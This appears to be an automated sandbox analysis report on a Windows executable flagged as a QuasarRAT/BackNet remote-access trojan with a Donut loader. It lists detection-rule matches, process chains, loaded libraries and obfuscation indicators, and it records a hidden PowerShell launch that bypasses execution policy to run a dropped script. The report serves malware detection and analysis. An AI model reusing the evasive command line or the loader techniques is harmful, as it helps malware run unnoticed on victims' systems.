              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.iniJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_013640BA0_2_013640BA
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_01363D700_2_01363D70
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_01360CE00_2_01360CE0
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_0136262F0_2_0136262F
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_0136410F0_2_0136410F
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_013649710_2_01364971
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_013649800_2_01364980
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_01360A280_2_01360A28
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_0136AA780_2_0136AA78
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_01363D600_2_01363D60
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_050900400_2_05090040
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C7C0652C2_2_00007FF7C7C0652C
              Source: C:\Windows\explorer.exeCode function: 8_2_10679FBC8_2_10679FBC
              Source: C:\Windows\explorer.exeCode function: 8_2_1067A38C8_2_1067A38C
              Source: C:\Windows\explorer.exeCode function: 8_2_1067B2648_2_1067B264
              Source: C:\Windows\explorer.exeCode function: 8_2_1067A7C48_2_1067A7C4
              Source: C:\Windows\explorer.exeCode function: 8_2_106790C88_2_106790C8
              Source: PI1qW7yV9K.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: PI1qW7yV9K.exe, 00000000.00000000.1333764956.00000000008B9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFrustrateHook Loader.exeL* vs PI1qW7yV9K.exe
              Source: PI1qW7yV9K.exe, 00000000.00000002.1746911837.0000000000F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PI1qW7yV9K.exe
              Source: PI1qW7yV9K.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
              Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
              Source: 00000008.00000002.2681806308.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
              Source: 00000008.00000000.1431061226.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000002.00000002.1548348801.0000023217860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.csCryptographic APIs: 'CreateDecryptor'
              Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@11/19@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C7C041C2 CreateToolhelp32Snapshot,2_2_00007FF7C7C041C2
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI1qW7yV9K.exe.logJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeFile created: C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1Jump to behavior
              Source: PI1qW7yV9K.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PI1qW7yV9K.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PI1qW7yV9K.exeVirustotal: Detection: 52%
              Source: PI1qW7yV9K.exeReversingLabs: Detection: 55%
              Source: unknownProcess created: C:\Users\user\Desktop\PI1qW7yV9K.exe "C:\Users\user\Desktop\PI1qW7yV9K.exe"
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP"Jump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /RJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dllJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: PI1qW7yV9K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PI1qW7yV9K.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: PI1qW7yV9K.exeStatic file information: File size 5141504 > 1048576
              Source: PI1qW7yV9K.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x47ce00
              Source: PI1qW7yV9K.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: PI1qW7yV9K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdbhP source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdb source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              .NET source code contains potential unpacker
              Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"Jump to behavior
              Source: PI1qW7yV9K.exeStatic PE information: 0xF1A8A219 [Mon Jun 23 11:16:41 2098 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"Jump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_01367443 pushfd ; iretd 0_2_01367445
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeCode function: 0_2_01368CAE pushfd ; ret 0_2_01368CB3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C7C09DC7 push esi; iretd 2_2_00007FF7C7C09DCD
              Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.csHigh entropy of concatenated method names: 'g79kQN2Jip', 'nW4lBacjpc', 'ae5kFRqYTY', 'PdwkzM40uu', 'Ppc8ph7aI4', 'wqZ8kgYCcR', 'OMo6lriETy', 'dmkfGRYpi', 'jRjPqKvKX', 'SH0cbLnd7'
              Source: PI1qW7yV9K.exe, BbDY5S8XPq3qWLFR1iB.csHigh entropy of concatenated method names: 'iLo8OSI5qW', 'MR587vhxF2', 'dHl8Luu0p3', 'CaN8WhbwV4', 'TSC8lw12Xj', 'rMv83ViQca', 'i598BOxh8O', 'OpK8DMWlhn', 'jyX8mQvv7Q', 'Tb28eVGI9F'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, X6ryA4MF9UUYiaF1V9.csHigh entropy of concatenated method names: 'NHNd4QbNPI', 'nridHbsJAPTHJ8uC648', 'mUsIxtsjZHkEwU7krva', 'yh8b0Asf89AegXRCOrK', 'zeYARpsHjYtXDIW39aZ', 'aQsyIpsVmVLVVfpxad1', 'NSIuwCsqad7BQ1SoJwE', 'z59smistuNGYDJOyPrs', 'paEbPNs6aaDLqQA3lx1', 'c7jCpBsiyyAnViPeoiP'
